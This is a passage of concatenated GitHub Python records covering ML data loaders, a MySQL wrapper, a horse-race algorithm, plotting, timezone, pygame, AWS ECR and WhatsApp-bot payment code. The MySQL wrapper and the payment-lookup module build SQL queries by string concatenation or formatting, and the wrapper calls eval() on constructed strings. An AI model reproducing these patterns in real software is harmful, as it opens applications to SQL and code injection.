tgt_pad)\n\n\t\t\tinput_ids_list.append(input_ids)\n\t\t\tsegment_ids_list.append(segment_ids)\n\t\t\tinput_mask_list.append(input_mask)\n\t\t\tmasked_ids_list.append(masked_ids)\n\t\t\tmasked_pos_list.append(masked_pos)\n\t\t\tmasked_weights_list.append(masked_weights)\n\t\t\ttgt_pos_list.append(tgt_pos)\n\t\t\tlabels_list.append(labels)\n\t\t\tks_labels_list.append(ks_labels)\n\t\t\tcheck_ids_list.append(check_ids)\n\n\n\t\tinput_mask_list = torch.stack(input_mask_list)\n\t\tlabels_list = torch.stack(labels_list)\n\t\tks_labels_list = torch.stack(ks_labels_list)\n\n\t\treturn (input_ids_list, segment_ids_list, input_mask_list, mask_qkv, masked_ids_list, masked_pos_list, masked_weights_list, -1, self.task_idx,\n\t\t\t\ttgt_pos_list, labels_list, ks_labels_list, check_ids_list)\n\n\n","repo_name":"nlpxucan/ZRKGC","sub_path":"ZRKGC/PPL/PPL_loader.py","file_name":"PPL_loader.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"12131035018","text":"import MySQLdb\nimport pprint\n\nclass Cnect_Database(object):\n    def __init__(self,ip,user,db,charset):\n        self.ip = ip\n        self.user = user\n        self.db = db\n        self.charset = charset\n\n    def connect(self,ps):\n        # Connect to the database and get a cursor\n        self.dadabase = MySQLdb.connect(self.ip,self.user, ps, self.db, charset=self.charset )\n        self.cursor = self.dadabase.cursor()\n        # Fetch and print the database version\n        self.cursor.execute(\"SELECT VERSION()\")\n        data = self.cursor.fetchone()\n        print(\"Database version : %s \" % data)\n\n    def register(self,data,namelist,tablename,yearspan):\n        # Drop the table if it already exists.\n        self.cursor.execute(\"DROP TABLE IF EXISTS \"+tablename)\n\n        # Build the column definitions before creating the table\n        creatlist = namelist.copy()\n        for i,ele in enumerate(creatlist):\n            if ele == 'year':\n                creatlist[i] = ele+' YEAR NOT NULL'\n            else:\n                creatlist[i] = ele + ' FLOAT'\n            # print(ele)\n        # SQL statement that creates the table\n        sql = \"CREATE TABLE \"+tablename+\" \"+str(tuple(creatlist)).replace(\"'\",'')\n        print(sql)\n        try:\n            # Execute the SQL statement\n            self.cursor.execute(sql)\n            # Commit to the database\n            self.dadabase.commit()\n        except:\n            # Rollback in case there is any error\n            self.dadabase.rollback()\n\n        # Pre-process the values to insert\n        vallist = namelist.copy()\n        for i,ele in enumerate(vallist):\n            # print(ele)\n            if ele == 'year':\n                vallist[i] = '2018-index'\n            else:\n                vallist[i] = 'data['+str(i)+'][index]'\n        # 2018-index,eval('total')[index],man[index],woman[index],city[index], countryside[index]\n        # SQL insert statement\n        # print(vallist)\n        for index in list(range(0,yearspan)):\n            sql = 
\"INSERT INTO \"+tablename+str(tuple(namelist)).replace(\"'\",'')+\" VALUES {}\".format(str(tuple(map(eval,vallist))))\n print(sql)\n try:\n # 执行sql语句\n self.cursor.execute(sql)\n # 提交到数据库执行\n self.dadabase.commit()\n # print('s')\n except:\n # Rollback in case there is any error\n self.dadabase.rollback()\n\n self.dadabase.close()\n\n def retrieval(self,itemlist,tablename):\n if itemlist == '*':\n sql = \"select * from \"+tablename\n else:\n sql = \"select \"+str(itemlist).replace(\"'\",'').strip('[]')+\" from \"+tablename\n print(sql)\n self.cursor.execute(sql)\n result = self.cursor.fetchall()\n # pprint.pprint(result)\n self.dadabase.close()\n return result\n\n ","repo_name":"KiritoHugh/Nation_statistic_crawler","sub_path":"Connect_database.py","file_name":"Connect_database.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37273418785","text":"# 田忌赛马问题\n# 田忌与齐王赛马,双方各有n匹马参赛(n<=100),每场比赛赌注为1两黄金,现已知齐王与田忌的每匹马的速度,并且齐王肯定是按马的速度从快到慢出场,现要你写一个程序帮助田忌计算他最好的结果是赢多少两黄金\n\n# solver1\n# 动态规划\n# f[i][j] 表示田忌在经过i场比赛后,使用了从慢到快的j匹慢马所达到的最大收益,则有\n# f[i][j] = max{ f[i-1][j] + score(i-j,j), f[i-1][j-1]+score(n-j+1,j) }\n# 其中score(x,y)表示田忌的第x匹马与齐王的第y匹马比赛所能获得的分数\n\ndef get_gold_by_one_race(horse_tian,horse_qi):\n return 1 if horse_tian > horse_qi else (-1 if horse_tian < horse_qi else 0)\n\ndef get_max_golds(horses_tian,horses_qi):\n horses_tian.sort(reverse=True)\n horses_qi.sort(reverse=True)\n\n max_golds = []\n # initailization, only one race\n max_golds.append([])\n max_golds[-1].append(get_gold_by_one_race(horses_tian[0],horses_qi[0])) # not use slow horse\n max_golds[-1].append(get_gold_by_one_race(horses_tian[-1],horses_qi[0])) # use slow horse\n\n # dp\n for race_num in range(2,len(horses_tian)+1):\n max_golds.append([])\n # slow_horse_num = 0\n max_golds[-1].append(max_golds[-2][0]+get_gold_by_one_race(horses_tian[race_num-1],horses_qi[race_num-1]))\n # 0 < slow_horse_num < race_num\n for slow_horse_num in range(1,race_num):\n max_golds[-1].append(\n max(max_golds[-2][slow_horse_num]+get_gold_by_one_race(horses_tian[race_num-slow_horse_num-1],horses_qi[race_num-1]),\n max_golds[-2][slow_horse_num-1]+get_gold_by_one_race(horses_tian[-slow_horse_num],horses_qi[race_num-1])))\n # slow_horse_num = race_num\n max_golds[-1].append(max_golds[-2][race_num-1]+get_gold_by_one_race(horses_tian[-race_num],horses_qi[race_num-1])) # slow_horse_num = race_num\n\n return max(max_golds[-1])\n\n# solver2\n# 贪心算法\n# 1. 如果田忌最慢的马能赢齐王最慢的马,则先赢一局\n# 2. 田忌最慢的马比齐王最慢的马慢,则和齐王最快的马比,先输一场\n# 3. 田忌最慢的马和齐王最慢的马相等\n# 1. 田忌最快的马比齐王最快的马快,先赢一场\n# 2. 田忌最快的马和齐王最快的马慢,拿最慢的马和齐王最快的马比\n# 3. 
\n\nfrom collections import deque\n\ndef get_max_golds2(horses_tian,horses_qi):\n    horses_tian.sort()\n    horses_qi.sort()\n    horses_tian = deque(horses_tian)\n    horses_qi = deque(horses_qi)\n\n    max_scores = 0\n    while(len(horses_tian) > 0):\n        if horses_tian[0] > horses_qi[0]:\n            max_scores += 1\n            horses_tian.popleft()\n            horses_qi.popleft()\n        elif horses_tian[0] < horses_qi[0]:\n            max_scores -= 1\n            horses_tian.popleft()\n            horses_qi.pop()\n        else:\n            if horses_tian[-1] > horses_qi[-1]:\n                max_scores += 1\n                horses_tian.pop()\n                horses_qi.pop()\n            elif horses_tian[-1] < horses_qi[-1]:\n                max_scores -= 1\n                horses_tian.popleft()\n                horses_qi.pop()\n            else:\n                if horses_tian[0] < horses_qi[-1]:\n                    max_scores -= 1\n                elif horses_tian[0] > horses_qi[-1]:\n                    max_scores += 1\n                horses_tian.popleft()\n                horses_qi.pop()\n\n    return max_scores\n\n\n\nif __name__ == \"__main__\":\n    horses_tian = [1,2,3,4]\n    horses_qi = [2,4,4,6]\n    print(get_max_golds2(horses_tian,horses_qi))\n","repo_name":"xtudbxk/practice","sub_path":"python/policy-horse_race.py","file_name":"policy-horse_race.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1483224158","text":"import torch, os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom get_logger import logger\r\n\r\ndef plot_logs(log, fields=(\"loss\", \"loss_ce\", \"loss_bbox\", \"loss_giou\"), log_name=\"log.txt\", ewm_col=1):\r\n    func_name = \"plot_utils.py::plot_logs\"\r\n    assert os.path.isdir(log), f\"{func_name} - log must be a dir...\"\r\n    if not os.path.exists(log):\r\n        raise ValueError(f\"{func_name} - logs not exist...\")\r\n\r\n    df = pd.read_json(os.path.join(log, log_name), lines=True)\r\n    fig, axs = plt.subplots(1, len(fields), figsize=(16, 5))\r\n\r\n    for df, color in zip([df], sns.color_palette(n_colors=1)):\r\n        for j, field in enumerate(fields):\r\n            df.interpolate().ewm(com=ewm_col).mean().plot(\r\n                y=[f\"train_{field}\", f\"test_{field}\"],\r\n                ax=axs[j],\r\n                color=[color] * 2,\r\n                style=[\"-\", \"--\"]\r\n            )\r\n    for ax, field in zip(axs, fields):\r\n        ax.legend([f\"train_{field}\", f\"test_{field}\"])\r\n        ax.set_title(field)\r\n        ax.set_xlabel(\"Epoch\")\r\n    log_name = log_name.split(\".\")[0]\r\n    logpath = os.path.join(log, f\"{log_name}.png\")\r\n    plt.savefig(logpath, dpi=300, bbox_inches=\"tight\")\r\n    logger.info(f\"log figure is saved in {logpath}...\")\r\n\r\nif __name__ == \"__main__\":\r\n    log = \"D:\\\\Desktop\\\\ECG分类研究\\\\code\\\\outputs\"\r\n    plot_logs(log, log_name=\"log01.txt\")\r\n","repo_name":"Anais-Y/Emotion-Recognition-with-4DRCNN-and-DGCNN_LSTM","sub_path":"utils/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38389564350","text":"from inspect import getmro\nfrom datetime import datetime, timedelta\nfrom time import mktime\n\nfrom pytzpure.random_utility.get_as_python import get_as_python\n\nfrom pytzpure.config import DEFAULT_TZ_MODULE_PREFIX\nfrom pytzpure.loader import load_module\n\n\nclass TzDescriptor(object):\n    def __init__(self, zone_name, parent_class_name, \n                 utc_transition_times_list=None, transition_info_list=None, \n                 utcoffset=None, tzname=None):\n\n        self.__zone_name = zone_name\n        self.__parent_class_name = parent_class_name\n        self.__utc_transition_times_list = utc_transition_times_list\n        
self.__transition_info_list = transition_info_list\n self.__utcoffset = utcoffset\n self.__tzname = tzname\n\n def __str__(self):\n return ('<%s>' % (self.__zone_name))\n\n @classmethod\n def load_from_file(cls, zone_name, module_prefix=DEFAULT_TZ_MODULE_PREFIX):\n module = load_module(zone_name, module_prefix)\n\n return cls(zone_name, module.parent_class_name, \n module.utc_transition_times_list, \n module.transition_info_list, module.utcoffset, \n module.tzname)\n\n @classmethod\n def create_from_pytz(cls, tz_info):\n \"\"\"Create an instance using the result of the timezone() call in \n \"pytz\".\n \"\"\"\n\n zone_name = tz_info.zone\n\n utc_transition_times_list_raw = getattr(tz_info, \n '_utc_transition_times', \n None)\n\n utc_transition_times_list = [tuple(utt.timetuple()) \n for utt \n in utc_transition_times_list_raw] \\\n if utc_transition_times_list_raw is not None \\\n else None\n \n transition_info_list_raw = getattr(tz_info, \n '_transition_info', \n None)\n\n transition_info_list = [(utcoffset_td.total_seconds(), \n dst_td.total_seconds(), \n tzname)\n for (utcoffset_td, dst_td, tzname)\n in transition_info_list_raw] \\\n if transition_info_list_raw is not None \\\n else None\n\n try:\n utcoffset_dt = tz_info._utcoffset\n except AttributeError:\n utcoffset = None\n else:\n utcoffset = utcoffset_dt.total_seconds()\n\n tzname = getattr(tz_info, '_tzname', None)\n\n parent_class_name = getmro(tz_info.__class__)[1].__name__\n return cls(zone_name, parent_class_name, utc_transition_times_list, \n transition_info_list, utcoffset, tzname)\n\n @property\n def zone_name(self):\n return self.__zone_name\n\n @property\n def parent_class_name(self):\n return self.__parent_class_name\n \n @property\n def utc_transition_times_list(self):\n return self.__utc_transition_times_list\n \n @property\n def utc_transition_times_list_formal(self):\n try:\n return self.__uttl\n except AttributeError:\n def translate(dt_tuple): \n return datetime.utcfromtimestamp(mktime(dt_tuple))\n\n self.__uttl = [translate(tuple(dt_tuple)) \\\n for dt_tuple \\\n in self.__utc_transition_times_list]\n \n return self.__uttl\n \n @property\n def transition_info_list_formal(self):\n try:\n return self.__til\n except AttributeError:\n self.__til = [(timedelta(seconds=utcoffset_seconds), \n timedelta(seconds=dst_seconds), \n tzname) \n for (utcoffset_seconds, dst_seconds, tzname) \n in self.__transition_info_list]\n\n return self.__til\n\n @property\n def utcoffset(self):\n return self.__utcoffset\n \n @property\n def utcoffset_formal(self):\n return timedelta(seconds=self.__utcoffset) \\\n if self.__utcoffset is not None \\\n else None\n \n @property\n def tzname(self):\n return self.__tzname\n\n @property\n def as_python(self):\n try:\n return self.__python\n except AttributeError:\n data = { 'zone_name': self.__zone_name,\n 'parent_class_name': self.__parent_class_name,\n 'utc_transition_times_list': self.__utc_transition_times_list,\n 'transition_info_list': self.__transition_info_list,\n 'utcoffset': self.__utcoffset,\n 'tzname': self.__tzname }\n\n self.__python = get_as_python(data)\n return self.__python\n\n","repo_name":"dsoprea/pytzPure","sub_path":"pytzpure/tz_descriptor.py","file_name":"tz_descriptor.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12503360608","text":"from src.WorldConstants import *\nimport src.Util\nimport pygame\n\nclass BlockCollision:\n def __init__(self, pos, level):\n self.x = 
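# --- Illustrative aside (not part of the surrounding records): a typical
# round trip for the TzDescriptor above, assuming pytz is installed; its
# create_from_pytz classmethod reads the private pytz attributes listed in
# the record. Sketch only:
# import pytz
# desc = TzDescriptor.create_from_pytz(pytz.timezone('US/Eastern'))
# print(desc)              # -> <US/Eastern>, via __str__
# source = desc.as_python  # the six fields serialised through get_as_python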
pos[0]\n self.y = pos[1]\n self.level = level\n\nclass MovingComponent:\n #obj must have a .sprite member\n def __init__(self, obj, level):\n self.obj = obj\n self.level = level\n\n self.position = (0, 0)\n self.velocity = (0, 0)\n self.acceleration = (0,0)\n self.sprite = obj.sprite\n self.size = (BLOCK_SIZE, BLOCK_SIZE)\n\n self.tiles = level.tiles\n self.tiles_col = level.col\n self.tiles_row = level.row\n\n self.in_air = False\n self.gravity = CONST_GRAVITY\n\n self.collides_with_tiles = True\n self.collides_with_entities = True\n self.collision_bounds = pygame.Rect(1,1,30,30)\n self.bounciness = 0\n\n def passfunc(obj1, obj2):\n pass\n\n self.on_collision = passfunc\n\n def point_in_wall(self,x,y):\n return self.level.point_in_wall((x,y))\n\n def push_out_colliders(self, colliders):\n magnitude = 0\n flag = 0\n factor = 1\n from src.Projectile import Projectile\n\n if isinstance(self.obj,Projectile):\n print(colliders)\n\n colliding_obj = None\n while flag == 0:\n my_sprite = self.sprite.sprite_rect()\n for i in range(2 * magnitude + 2):\n if flag == 1:\n break\n for j in range(2 * magnitude + 2):\n if flag==1:\n break\n\n d = (factor * (int(i / 2) * ((-1) ** (i % 2))), factor * (int(j / 2) * ((-1) ** (j % 2))))\n\n #if d[0] is not m and d[1] is not m:\n # continue\n\n b = False\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1])\n if b and colliding_obj is None:\n #print(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1]), self.level)\n\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1])\n\n if b and colliding_obj is None:\n #(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1] + self.collision_bounds[1]), self.level)\n\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3])\n\n if b and colliding_obj is None:\n #print(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0] + self.collision_bounds[0],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3]), self.level)\n\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3])\n\n if b and colliding_obj is None:\n #print(\"setting block collider\")\n colliding_obj = BlockCollision(src.Util.pixel2cell(self.sprite.sprite_rect().topleft[0] + d[0]\n + self.collision_bounds[0] + self.collision_bounds[2],\n self.sprite.sprite_rect().topleft[1] + d[1]\n + self.collision_bounds[1] + self.collision_bounds[3]), self.level)\n\n if b == False:\n for k in range(len(colliders)):\n new_rect = pygame.Rect(my_sprite.topleft[0]+d[0]+self.collision_bounds[0],\n 
my_sprite.topleft[1]+d[1]+self.collision_bounds[1],\n self.collision_bounds[2], self.collision_bounds[3])\n b = b or new_rect.colliderect(colliders[k].sprite.sprite_rect())\n #b = b or src.Util.rect_intersect(new_rect, colliders[k].sprite.sprite_rect())\n if b:\n from src.Projectile import Projectile\n if type(self.obj)==Projectile:\n print(\"colliding:\")\n print(self.obj)\n print(colliders[k])\n if colliding_obj is None:\n print(\"setting collider\")\n colliding_obj = colliders[k]\n break\n\n from src.Skeleton import Skeleton\n\n if b == False:\n self.move(d)\n flag = 1\n debug = 0\n if (d[0] != 0):\n self.velocity = (-self.velocity[0] * self.bounciness, self.velocity[1])\n if type(self.obj)==Skeleton:\n print(\"set vel\")\n print(\"p1\")\n print(colliding_obj)\n debug = 1\n assert magnitude > 0\n assert colliding_obj is not None\n\n if (d[1] != 0):\n self.velocity = (self.velocity[0], -self.velocity[1] * self.bounciness)\n #print(\"set vel\")\n assert magnitude > 0\n assert colliding_obj is not None\n\n assert colliding_obj is not None or magnitude == 0\n if debug>0:\n if type(self.obj) == Skeleton:\n print(\"p2\")\n print(colliding_obj)\n if colliding_obj is not None:\n self.on_collision(self.obj, colliding_obj)\n if debug > 0 and type(self.obj)==Skeleton:\n print(\"called collision\")\n elif debug > 0 and type(self.obj)==Skeleton:\n print(\"not called collision\")\n break\n\n magnitude += int(magnitude/10) + 1\n\n def snap_out(self):\n m = 0\n flag = 0\n factor = 1\n while flag==0:\n for i in range(2*m+1):\n if flag==1:\n break\n for j in range(2*m+1):\n d = (factor*(int(i/2)*((-1)**(i%2))),factor*(int(j/2)*((-1)**(j%2))))\n\n #if d[0] is not m and d[1] is not m:\n # continue\n\n b = False\n b = b or self.point_in_wall(self.sprite.sprite_rect().topleft[0] + d[0] +1,self.sprite.sprite_rect().topleft[1] + d[1] +1)\n b = b or self.point_in_wall(self.sprite.sprite_rect().topright[0] + d[0] -1,self.sprite.sprite_rect().topright[1] + d[1] +1)\n b = b or self.point_in_wall(self.sprite.sprite_rect().bottomleft[0] + d[0] +1,self.sprite.sprite_rect().bottomleft[1] + d[1] -1)\n b = b or self.point_in_wall(self.sprite.sprite_rect().bottomright[0] + d[0] -1,self.sprite.sprite_rect().bottomright[1] + d[1] -1)\n\n if b == False:\n self.move(d)\n if (d[0] != 0):\n self.velocity = (-self.velocity[0]*self.bounciness, self.velocity[1])\n if (d[1] != 0):\n self.velocity = (self.velocity[0], -self.velocity[1]*self.bounciness)\n #print(m)\n flag=1\n break\n m += 1\n\n def move(self, displacement):\n self.sprite.move(displacement)\n newx = self.position[0] + int(displacement[0])\n newy = self.position[1] + int(displacement[1])\n self.position = (newx, newy)\n\n def update_position(self, displacement):\n from src.Player import Player\n from src.Projectile import Projectile\n old_pos = self.position\n\n #update position\n self.move(displacement)\n\n #check for collisions\n if self.collides_with_tiles:\n #self.snap_out()\n #if isinstance(self.obj, Player) or isinstance(self.obj, Projectile):\n # copy = list(self.level.colliders)\n # self.push_out_colliders(copy)\n\n bounds = (32,32)\n\n vel_rect = None\n if displacement[0] >= 0:\n if displacement[1] >= 0:\n vel_rect = pygame.Rect(old_pos[0], old_pos[1],\n displacement[0]+bounds[0], displacement[1]+bounds[1])\n else:\n vel_rect = pygame.Rect(old_pos[0], old_pos[1] + bounds[1],\n displacement[0],\n displacement[1] + bounds[1])\n else:\n if displacement[1] >= 0:\n vel_rect = pygame.Rect(old_pos[0]+ bounds[0], old_pos[1],\n displacement[0], 
displacement[1]+bounds[1])\n            else:\n                vel_rect = pygame.Rect(old_pos[0]+ bounds[0], old_pos[1] + bounds[1],\n                                       displacement[0],\n                                       displacement[1])\n\n            copy = []\n            if self.collides_with_entities:\n                #if isinstance(self.obj, Player) or isinstance(self.obj, Projectile):\n                for ent in self.level.colliders:\n                    if ent is not self.obj:\n                        #if vel_rect.colliderect(ent.sprite.sprite_rect()):\n                        copy.append(ent)\n                self.push_out_colliders(copy)\n\n        #check if falling\n        if old_pos[1]==self.position[1]:\n            self.in_air = False\n        else:\n            self.in_air = True\n\n    def update_velocity(self, acceleration):\n        newx = self.velocity[0] + acceleration[0]\n        newy = self.velocity[1] + acceleration[1]\n\n        #cap the velocity\n        if(newx>CONST_MAX_VELOCITY):\n            newx = CONST_MAX_VELOCITY\n        if(newy>CONST_MAX_VELOCITY):\n            newy=CONST_MAX_VELOCITY\n\n        self.velocity = (newx, newy)\n\n    def update(self, deltatime):\n        dt = deltatime / 1000\n\n        # update parameters\n        self.update_position((self.velocity[0] * dt, self.velocity[1] * dt))\n\n        self.update_velocity(((self.acceleration[0] * dt, self.acceleration[1] * dt)))\n\n        self.acceleration = (self.acceleration[0], self.gravity)\n","repo_name":"waivek/Medusa","sub_path":"src/MovingComponent.py","file_name":"MovingComponent.py","file_ext":"py","file_size_in_byte":12219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17972647180","text":"import numpy as np\r\nimport pandas as pd\r\n\r\n# Set up the initial state (all zeros)\r\ninitial_state = np.zeros(192, dtype=int)\r\n\r\n# Set up the state transition matrix\r\ntransition_matrix = np.array([[0.25, 0.25, 0.25, 0.25]] * 4)\r\n\r\n# Perform the simulation\r\nstate = initial_state\r\nstates = [] # List to store the states\r\nfor _ in range(10000): # however many steps you want\r\n    for i in range(192):\r\n        state[i] = np.random.choice(4, p=transition_matrix[state[i]])\r\n    states.append(state.copy()) # Store the state\r\n\r\n# Convert the states to a DataFrame and save to a CSV file\r\ndf = pd.DataFrame(states)\r\ndf.to_csv('statese.csv', index=False)\r\n","repo_name":"SirFlickka/quantumQutrits","sub_path":"ap.py","file_name":"ap.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39488851674","text":"# Given two strings S1 and S2, write a function that checks whether S2 contains a permutation of S1\n# In other words, one of the permutations of the first string is a substring of the second string.\n\nclass Solution:\n    def checkInclusion(self,s1:str,s2:str):\n        if (len(s1) str:\n        return self._registry_id\n\n    @staticmethod\n    def findRegistry() -> object:\n        registryId = None\n        try:\n            registryId = Session.ecr_client.describe_registry()['registryId']\n            logging.info(f\"Found ECR Registry '{registryId}'\")\n        except (IndexError, ClientError):\n            logging.info(f\"ECR Registry not found\")\n        return Registry(registryId) if registryId else None\n    \n\n    def findRepository(self: object, name: str) -> Repository: \n        ecr_arn = None\n        ecr_uri = None\n        ecr_name = None\n        try:\n            repositories = Session.ecr_client.describe_repositories(\n                registryId = self._registry_id, \n                repositoryNames = [ name ]\n            )['repositories']\n\n            if len(repositories) == 0: raise IndexError(f\"Unable to find ECR repository '{name}'\")\n            # intentionally not caught\n            if len(repositories) != 1: raise RuntimeError(f\"Unexpected results. 
Expected 1 ECR repository but got {len(repositories)}\")\n repository = repositories[0]\n ecr_arn = repository['repositoryArn']\n ecr_uri = repository['repositoryUri']\n ecr_name = repository['repositoryName']\n logging.info(f\"Found ECR Repository '{ecr_name}': {ecr_uri}\")\n except (IndexError,ClientError):\n logging.info(f\"ECR Repository '{name}' not found\")\n return Repository(registry_id=self._registry_id, name=ecr_name, arn=ecr_arn, uri=ecr_uri) if ecr_name else None\n\n def getRepository(self: object, name: str, imageTagMutability: ImageTagMutability = ImageTagMutability.MUTABLE, scanOnPush: str = True) -> Repository:\n repository = self.findRepository(name)\n if repository: return repository\n\n ecr_arn = None\n ecr_uri = None\n ecr_name = None\n logging.info(f\"Creating ECR Registry '{name}'\")\n repository = Session.ecr_client.create_repository(\n registryId = self._registry_id,\n repositoryName = name, \n imageTagMutability=imageTagMutability.value, \n imageScanningConfiguration= {\n 'scanOnPush': scanOnPush\n }, \n encryptionConfiguration= {\n 'encryptionType': 'KMS'\n }\n )['repository']\n ecr_arn = repository['repositoryArn']\n ecr_uri = repository['repositoryUri']\n ecr_name = repository['repositoryName']\n logging.info(f\"Created ECR Repository '{name}': {ecr_uri}\")\n return Repository(registry_id=self._registry_id, name=ecr_name, arn=ecr_arn, uri=ecr_uri)\n","repo_name":"tomdemay/glcloud","sub_path":"common/ecr/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17340464986","text":"import pymysql, config, os\n\nfrom lib import wa, reply\nfrom module import kelas\n\ndef auth(data):\n if kelas.isParent(data[0]):\n ret=True\n else:\n ret=False\n return ret\n\ndef replymsg(driver, data):\n num=data[0]\n wmsg = reply.getWaitingMessage(os.path.basename(__file__).split('.')[0])\n wmsg = wmsg.replace('#BOTNAME#', config.bot_name)\n wa.typeAndSendMessage(driver, wmsg)\n npmmahasiswa=kelas.getStudentIdFromParentPhoneNumber(num)\n msgreply=''\n for i in npmmahasiswa:\n vadata = getVaData(i[0])\n virtualaccount = vadata[0]\n jumlahygharusdibayar = vadata[1]\n jumlahterakhirbayar = vadata[2]\n jumlahygsudahdibayar = vadata[3]\n waktuterakhirbayar = vadata[4].strftime('%d-%m-%Y %H:%M:%S')\n customername=vadata[5]\n msgreply+=\"Nama: {customername}\\nNomor virtual account: {virtualaccount}\\nTotal yang harus dibayar: {jumlahygharusdibayar}\\nTotal yang sudah dibayar: {jumlahygsudahdibayar}\\n\\nJumlah terakhir pembayaran: {jumlahterakhirbayar}\\nWaktu terakhir pembayaran: {waktuterakhirbayar}\\n\\n\".format(waktuterakhirbayar=waktuterakhirbayar, jumlahterakhirbayar=jumlahterakhirbayar, jumlahygsudahdibayar=jumlahygsudahdibayar, jumlahygharusdibayar=jumlahygharusdibayar, virtualaccount=virtualaccount, customername=customername)\n return msgreply\n\ndef dbConnectVA():\n db=pymysql.connect(config.db_host_va, config.db_username_va, config.db_password_va, config.db_name_va)\n return db\n\ndef getVaData(studentid):\n db=dbConnectVA()\n sql=\"select virtual_account, trx_amount, payment_amount, cumulative_payment_amount, datetime_payment, customer_name from payment_notification where trx_id like '%{npm}%' group by trx_id desc limit 1\".format(npm=studentid)\n with db:\n cur=db.cursor()\n cur.execute(sql)\n row=cur.fetchone()\n return 
row","repo_name":"riandakarizal/ITeung","sub_path":"module/va_parent.py","file_name":"va_parent.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10959975800","text":"import numpy\nimport pandas\nimport matplotlib.pyplot as plt\nfrom mlxtend.preprocessing import one_hot\n\ndef import_data():\n dataframe = pandas.read_csv('./Dataset1.csv')\n return dataframe\n\ndef info_data():\n data = import_data()\n print(data.head(10),\"\\n\") # print first 10 raws\n print(data.info(),\"\\n\") # print info about dataframe\n print(data.shape,\"\\n\") # print dataframe shape\n print(data.describe(),\"\\n\") # print info about values\n print(data.corr(),\"\\n\") # dataframe correlation\n\n # Convert object type to float type\n data.NGP=pandas.to_numeric(pandas.Series(data.NGP), errors='coerce');\n data.EGT=pandas.to_numeric(pandas.Series(data.EGT), errors='coerce');\n data.WF=pandas.to_numeric(pandas.Series(data.WF), errors='coerce');\n data.dropna(inplace=True) # Drop all NaN values\n\n # Graphics\n plt.plot(data['NGP'])\n plt.ylabel('Parameter N')\n plt.show()\n plt.plot(data['EGT'],color='red')\n plt.ylabel('Parameter EGT')\n plt.show()\n plt.plot(data['WF'],color='green')\n plt.ylabel('Parameter WF')\n plt.show()\n\ndef input_data():\n df = import_data() # import dataframe\n divide = 3584 # value for divide data on train and test\n df.drop('dateandtime',inplace=True,axis=1)\n # Convert object type to float type\n df.NGP=pandas.to_numeric(pandas.Series(df.NGP), errors='coerce');\n df.EGT=pandas.to_numeric(pandas.Series(df.EGT), errors='coerce');\n df.WF=pandas.to_numeric(pandas.Series(df.WF), errors='coerce');\n df.dropna(inplace=True)\n # Divide data on train and test without shuffle\n train_X = numpy.array(df.values[:divide,0:3])\n train_Y_p = numpy.array(df.values[:divide,3:])\n test_X = numpy.array(df.values[divide:,0:3])\n test_Y_p = numpy.array(df.values[divide:,3:])\n # Peapare one hot encode\n train_Y_p = train_Y_p.astype('int') # Convert to int type (train data)\n test_Y_p = test_Y_p.astype('int') # Convert to int type (test data)\n trf = train_Y_p.ravel() # Need be dimension 1, to encode in one hot\n tref = test_Y_p.ravel() # Need be dimension 1, to encode in one hot\n traf_Y = one_hot(trf, num_labels=3) # num_labels need be same as your classes (0,1,2)\n tres_Y = one_hot(tref, num_labels=3) # num_labels need be same as your classes (0,1,2)\n train_Y_en = numpy.array(traf_Y) # one hot numpy array (train data)\n test_Y_en = numpy.array(tres_Y) # one hot numpy array (test data)\n print(train_Y_en)\n\n # It is one hot:\n #_______________________________\n #|__good__|_anomaly_|_anomaly1_|\n #|____1___|____0____|_____0____|\n #|____0___|____1____|_____0____|\n #|____0___|____0____|_____1____|\n\n return train_X, test_X, train_Y_en, 